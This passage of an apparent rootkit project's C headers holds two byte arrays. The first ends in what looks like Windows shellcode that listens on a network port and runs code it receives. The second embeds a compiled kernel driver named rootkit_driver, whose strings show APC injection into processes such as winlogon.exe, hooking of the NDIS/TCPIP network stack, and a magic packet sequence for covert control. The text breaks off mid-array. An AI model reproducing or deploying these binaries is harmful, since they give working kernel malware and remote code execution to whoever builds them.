0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00, 0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff, 0xd5,0x97,0x31,0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57, 0x68,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,0xd5, 0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x97,0x68,0x75,0x6e,0x4d, 0x61,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5, 0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53, 0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff, 0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0xc8,0x00,0x00,0x00,0x27,0x30,0x2e,0x30,0x34,0x30,0x3b,0x30, 0x4d,0x30,0x54,0x30,0x66,0x30,0x73,0x30,0x85,0x30,0x97,0x30,0x9e,0x30,0xba,0x30, 0xd5,0x30,0xdc,0x30,0xee,0x30,0x03,0x31,0x0d,0x31,0x2b,0x31,0x38,0x31,0x40,0x31, 0x46,0x31,0x4d,0x31,0x66,0x31,0x6e,0x31,0x74,0x31,0x7b,0x31,0x88,0x31,0x8f,0x31, 0x9e,0x31,0xa4,0x31,0xb6,0x31,0xbd,0x31,0xca,0x31,0xd1,0x31,0xef,0x31,0xf4,0x31, 0x7e,0x32,0x85,0x32,0x95,0x32,0xa0,0x32,0xae,0x32,0xb5,0x32,0xe3,0x32,0x00,0x33, 0x0a,0x33,0x17,0x33,0x2b,0x33,0x31,0x33,0x3b,0x33,0x63,0x33,0x68,0x33,0x70,0x33, 0x78,0x33,0x83,0x33,0xc4,0x33,0xca,0x33,0xcf,0x33,0xd7,0x33,0xec,0x33,0xf1,0x33, 0x05,0x34,0x0a,0x34,0x2a,0x34,0x56,0x34,0x86,0x34,0x8c,0x34,0x9b,0x34,0xa3,0x34, 0xc0,0x34,0xc9,0x34,0xd0,0x34,0xe2,0x34,0xe8,0x34,0xee,0x34,0xf4,0x34,0xfa,0x34, 0x00,0x35,0x06,0x35,0x0c,0x35,0x12,0x35,0x18,0x35,0x1e,0x35,0x24,0x35,0x2a,0x35, 0x30,0x35,0x36,0x35,0x3c,0x35,0x42,0x35,0x48,0x35,0x4e,0x35,0x54,0x35,0x5a,0x35, 0x60,0x35,0x66,0x35,0x6c,0x35,0x72,0x35,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; ================================================ FILE: src/includes/rootkit_driver_debug.sys.h ================================================ // 23680 bytes readed form ..\rootkit_driver_debug.sys... unsigned char rootkit_driver[] = { 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0x00,0x00,0x00, 0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68, 0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f, 0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20, 0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x45,0x95,0x8a,0x93,0x01,0xf4,0xe4,0xc0,0x01,0xf4,0xe4,0xc0,0x01,0xf4,0xe4,0xc0, 0x01,0xf4,0xe5,0xc0,0x2b,0xf4,0xe4,0xc0,0x26,0x32,0x9f,0xc0,0x04,0xf4,0xe4,0xc0, 0x26,0x32,0x89,0xc0,0x03,0xf4,0xe4,0xc0,0x08,0x8c,0x60,0xc0,0x07,0xf4,0xe4,0xc0, 0x08,0x8c,0x76,0xc0,0x00,0xf4,0xe4,0xc0,0x08,0x8c,0x75,0xc0,0x00,0xf4,0xe4,0xc0, 0x52,0x69,0x63,0x68,0x01,0xf4,0xe4,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x56,0x00,0x00, 0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x26,0x00,0x00,0x80,0x02,0x00,0x00, 0x80,0x2d,0x00,0x00,0x00,0x00,0x00,0x10,0x80,0x00,0x00,0x00,0x80,0x00,0x00,0x00, 0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x80,0x5c,0x00,0x00,0x80,0x02,0x00,0x00,0x46,0xc6,0x00,0x00,0x01,0x00,0x00,0x00, 0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x41,0x00,0x00,0x00, 0xf4,0x54,0x00,0x00,0x3c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x80,0x59,0x00,0x00,0xd0,0x02,0x00,0x00,0x80,0x03,0x00,0x00,0x1c,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x68,0x0e,0x00,0x00,0x40,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x02,0x00,0x00,0xb0,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00, 0x8c,0x2a,0x00,0x00,0x80,0x02,0x00,0x00,0x00,0x2b,0x00,0x00,0x80,0x02,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x68, 0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0xa0,0x00,0x00,0x00,0x80,0x2d,0x00,0x00, 0x00,0x01,0x00,0x00,0x80,0x2d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc8,0x49,0x4e,0x49,0x54,0x00,0x00,0x00,0x00, 0xfa,0x2a,0x00,0x00,0x80,0x2e,0x00,0x00,0x00,0x2b,0x00,0x00,0x80,0x2e,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0xe2, 0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xd8,0x02,0x00,0x00,0x80,0x59,0x00,0x00, 0x00,0x03,0x00,0x00,0x80,0x59,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x44,0x59,0x00,0x00,0x2c,0x59,0x00,0x00,0x5e,0x59,0x00,0x00,0x00,0x00,0x00,0x00, 0x1c,0x56,0x00,0x00,0x30,0x56,0x00,0x00,0x48,0x56,0x00,0x00,0x66,0x56,0x00,0x00, 0x82,0x56,0x00,0x00,0x9a,0x56,0x00,0x00,0xb0,0x56,0x00,0x00,0xba,0x56,0x00,0x00, 0xd4,0x56,0x00,0x00,0xe8,0x56,0x00,0x00,0xf2,0x56,0x00,0x00,0x0c,0x57,0x00,0x00, 0x26,0x57,0x00,0x00,0x3e,0x57,0x00,0x00,0x52,0x57,0x00,0x00,0x64,0x57,0x00,0x00, 0x7c,0x57,0x00,0x00,0x0e,0x56,0x00,0x00,0xb0,0x57,0x00,0x00,0xc4,0x57,0x00,0x00, 0xd4,0x57,0x00,0x00,0xe6,0x57,0x00,0x00,0x06,0x58,0x00,0x00,0x1a,0x58,0x00,0x00, 0x24,0x58,0x00,0x00,0x2e,0x58,0x00,0x00,0x46,0x58,0x00,0x00,0x50,0x58,0x00,0x00, 0x5a,0x58,0x00,0x00,0x76,0x58,0x00,0x00,0x98,0x58,0x00,0x00,0xb6,0x58,0x00,0x00, 0xd2,0x58,0x00,0x00,0xea,0x58,0x00,0x00,0x0a,0x59,0x00,0x00,0x04,0x56,0x00,0x00, 0xec,0x55,0x00,0x00,0x98,0x57,0x00,0x00,0xe0,0x55,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x58,0x03,0x00,0x00, 0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x72,0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5f, 0x64,0x72,0x69,0x76,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x73,0x79,0x73, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xc6,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00, 0x64,0x00,0x00,0x00,0xb0,0x0e,0x00,0x00,0xb0,0x0e,0x00,0x00,0x42,0x00,0x6f,0x00, 0x67,0x00,0x75,0x00,0x73,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x74,0x00,0x6f,0x00, 0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x65,0x72, 0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73, 0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78, 0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x4b,0x65,0x72,0x6e,0x65,0x6c, 0x41,0x70,0x63,0x52,0x6f,0x75,0x74,0x69,0x6e,0x65,0x28,0x29,0x0a,0x00,0x00,0x00, 0x49,0x6e,0x6a,0x65,0x63,0x74,0x46,0x69,0x6e,0x64,0x50,0x72,0x6f,0x63,0x65,0x73, 0x73,0x28,0x29,0x3a,0x20,0x22,0x25,0x77,0x5a,0x22,0x2c,0x20,0x50,0x49,0x44,0x20, 0x3d,0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x50,0x73,0x4c,0x6f,0x6f,0x6b,0x75,0x70, 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f,0x63,0x65,0x73,0x73, 0x49,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3b,0x20,0x73,0x74,0x61,0x74, 0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x50,0x73,0x4c,0x6f, 0x6f,0x6b,0x75,0x70,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x50,0x72,0x6f, 0x63,0x65,0x73,0x73,0x49,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3b,0x20, 0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00, 0x49,0x6d,0x6a,0x65,0x63,0x74,0x4d,0x61,0x70,0x44,0x6c,0x6c,0x49,0x6d,0x61,0x67, 0x65,0x28,0x29,0x3a,0x20,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x20,0x66,0x6f,0x72,0x20, 0x69,0x6d,0x61,0x67,0x65,0x20,0x61,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20, 0x61,0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x49,0x6d,0x6a,0x65, 0x63,0x74,0x4d,0x61,0x70,0x44,0x6c,0x6c,0x49,0x6d,0x61,0x67,0x65,0x28,0x29,0x20, 0x45,0x58,0x43,0x45,0x50,0x54,0x49,0x4f,0x4e,0x0a,0x00,0x00,0x5a,0x77,0x41,0x6c, 0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d, 0x6f,0x72,0x79,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61, 0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00, 0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69, 0x6f,0x6e,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x20,0x66,0x61,0x69,0x6c, 0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38, 0x78,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72, 0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x3a,0x20,0x49,0x6d,0x61,0x67,0x65,0x20,0x65, 0x6e,0x74,0x72,0x79,0x20,0x70,0x6f,0x69,0x6e,0x74,0x20,0x69,0x73,0x20,0x61,0x74, 0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x43,0x61,0x6c,0x6c, 0x67,0x61,0x74,0x65,0x20,0x61,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x61, 0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65, 0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x3a, 0x20,0x45,0x72,0x72,0x6f,0x72,0x20,0x77,0x68,0x69,0x6c,0x65,0x20,0x64,0x65,0x6c, 0x69,0x76,0x65,0x72,0x69,0x6e,0x67,0x20,0x41,0x50,0x43,0x0a,0x00,0x00,0x00,0x00, 0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e,0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73, 0x73,0x28,0x29,0x3a,0x20,0x41,0x50,0x43,0x20,0x64,0x65,0x6c,0x69,0x76,0x65,0x72, 0x65,0x64,0x21,0x0a,0x00,0x00,0x00,0x00,0x4b,0x65,0x49,0x6e,0x73,0x65,0x72,0x74, 0x51,0x75,0x65,0x75,0x65,0x41,0x70,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52, 0x0a,0x00,0x00,0x00,0x5a,0x77,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69, 0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x28,0x29,0x20,0x66,0x61, 0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78,0x25, 0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e, 0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x28,0x29,0x20,0x45,0x58,0x43,0x45, 0x50,0x54,0x49,0x4f,0x4e,0x0a,0x00,0x00,0x4f,0x62,0x4f,0x70,0x65,0x6e,0x4f,0x62, 0x6a,0x65,0x63,0x74,0x42,0x79,0x50,0x6f,0x69,0x6e,0x74,0x65,0x72,0x28,0x29,0x20, 0x66,0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30, 0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e, 0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x4e,0x61,0x6d,0x65,0x28, 0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20, 0x74,0x6f,0x20,0x66,0x69,0x6e,0x64,0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20, 0x22,0x25,0x77,0x73,0x22,0x0a,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e, 0x74,0x6f,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x42,0x79,0x49,0x64,0x28,0x29,0x20, 0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f, 0x20,0x66,0x69,0x6e,0x64,0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x50,0x49, 0x44,0x3d,0x25,0x64,0x0a,0x00,0x00,0x00,0x49,0x6e,0x6a,0x65,0x63,0x74,0x49,0x6e, 0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52, 0x3a,0x20,0x55,0x6e,0x6b,0x6e,0x6f,0x77,0x6e,0x20,0x4e,0x54,0x20,0x76,0x65,0x72, 0x73,0x69,0x6f,0x6e,0x0a,0x00,0x00,0x00,0x4e,0x74,0x50,0x72,0x6f,0x74,0x65,0x63, 0x74,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x28,0x29, 0x20,0x53,0x44,0x54,0x20,0x6e,0x75,0x6d,0x62,0x65,0x72,0x20,0x69,0x73,0x20,0x30, 0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b, 0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52, 0x4f,0x52,0x3a,0x20,0x4e,0x44,0x49,0x53,0x20,0x76,0x65,0x72,0x73,0x69,0x6f,0x6e, 0x20,0x30,0x78,0x25,0x78,0x20,0x69,0x73,0x20,0x6e,0x6f,0x74,0x20,0x73,0x75,0x70, 0x70,0x6f,0x72,0x74,0x65,0x64,0x0a,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00, 0x54,0x00,0x43,0x00,0x50,0x00,0x49,0x00,0x50,0x00,0x00,0x00,0x4e,0x64,0x69,0x73, 0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x22,0x54,0x43,0x50,0x49, 0x50,0x22,0x20,0x70,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x20,0x61,0x64,0x64,0x72, 0x65,0x73,0x73,0x20,0x69,0x73,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00, 0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x4f, 0x70,0x65,0x6e,0x20,0x62,0x6c,0x6f,0x63,0x6b,0x20,0x3d,0x20,0x30,0x78,0x25,0x2e, 0x38,0x78,0x2c,0x20,0x4d,0x69,0x6e,0x69,0x70,0x6f,0x72,0x74,0x20,0x3d,0x20,0x30, 0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b, 0x53,0x65,0x74,0x28,0x29,0x3a,0x20,0x48,0x6f,0x6f,0x6b,0x69,0x6e,0x67,0x20,0x4d, 0x69,0x6e,0x69,0x70,0x6f,0x72,0x74,0x44,0x70,0x63,0x3a,0x20,0x30,0x78,0x25,0x2e, 0x38,0x78,0x20,0x2d,0x3e,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00, 0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b,0x53,0x65,0x74,0x28,0x29,0x20,0x45,0x52, 0x52,0x4f,0x52,0x3a,0x20,0x55,0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,0x20,0x66, 0x69,0x6e,0x64,0x20,0x22,0x54,0x43,0x50,0x49,0x50,0x22,0x20,0x70,0x72,0x6f,0x74, 0x6f,0x63,0x6f,0x6c,0x0a,0x00,0x00,0x00,0x25,0x64,0x2e,0x25,0x64,0x2e,0x25,0x64, 0x2e,0x25,0x64,0x00,0x00,0x00,0x00,0x00,0x77,0x00,0x69,0x00,0x6e,0x00,0x6c,0x00, 0x6f,0x00,0x67,0x00,0x6f,0x00,0x6e,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b, 0x48,0x61,0x6e,0x64,0x6c,0x65,0x42,0x75,0x66,0x66,0x65,0x72,0x28,0x29,0x20,0x49, 0x50,0x3a,0x20,0x46,0x72,0x6f,0x6d,0x20,0x3d,0x20,0x25,0x73,0x2c,0x20,0x54,0x6f, 0x20,0x3d,0x20,0x25,0x73,0x2c,0x20,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x20, 0x3d,0x20,0x25,0x64,0x2c,0x20,0x4c,0x65,0x6e,0x67,0x74,0x68,0x20,0x3d,0x20,0x25, 0x64,0x0a,0x00,0x00,0x52,0x4b,0x43,0x54,0x4c,0x3a,0x37,0x43,0x35,0x45,0x33,0x33, 0x38,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x4e,0x64,0x69,0x73,0x48,0x6f,0x6f,0x6b, 0x48,0x61,0x6e,0x64,0x6c,0x65,0x42,0x75,0x66,0x66,0x65,0x72,0x28,0x29,0x3a,0x20, 0x4d,0x61,0x67,0x69,0x63,0x20,0x73,0x65,0x71,0x75,0x65,0x6e,0x63,0x65,0x20,0x68, 0x61,0x73,0x20,0x62,0x65,0x65,0x6e,0x20,0x66,0x69,0x6e,0x64,0x20,0x69,0x6e,0x20, 0x6e,0x65,0x74,0x77,0x6f,0x72,0x6b,0x20,0x70,0x61,0x63,0x6b,0x65,0x74,0x21,0x0a, 0x00,0x00,0x00,0x00,0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74, 0x65,0x6d,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73, 0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x44,0x72,0x69,0x76, 0x65,0x72,0x45,0x6e,0x74,0x72,0x79,0x43,0x6f,0x6e,0x74,0x69,0x6e,0x75,0x65,0x54, 0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x50,0x61,0x72,0x61,0x6d,0x20,0x3d, 0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x45,0x78,0x41,0x6c, 0x6c,0x6f,0x63,0x61,0x74,0x65,0x50,0x6f,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69, 0x6c,0x73,0x0a,0x00,0x4e,0x65,0x77,0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74, 0x72,0x79,0x28,0x29,0x3a,0x20,0x48,0x6f,0x6f,0x6b,0x65,0x64,0x20,0x64,0x72,0x69, 0x76,0x65,0x72,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x73,0x20,0x30,0x78,0x25,0x2e, 0x38,0x78,0x0a,0x00,0x4e,0x65,0x77,0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74, 0x72,0x79,0x28,0x29,0x3a,0x20,0x53,0x74,0x61,0x72,0x74,0x20,0x61,0x64,0x64,0x72, 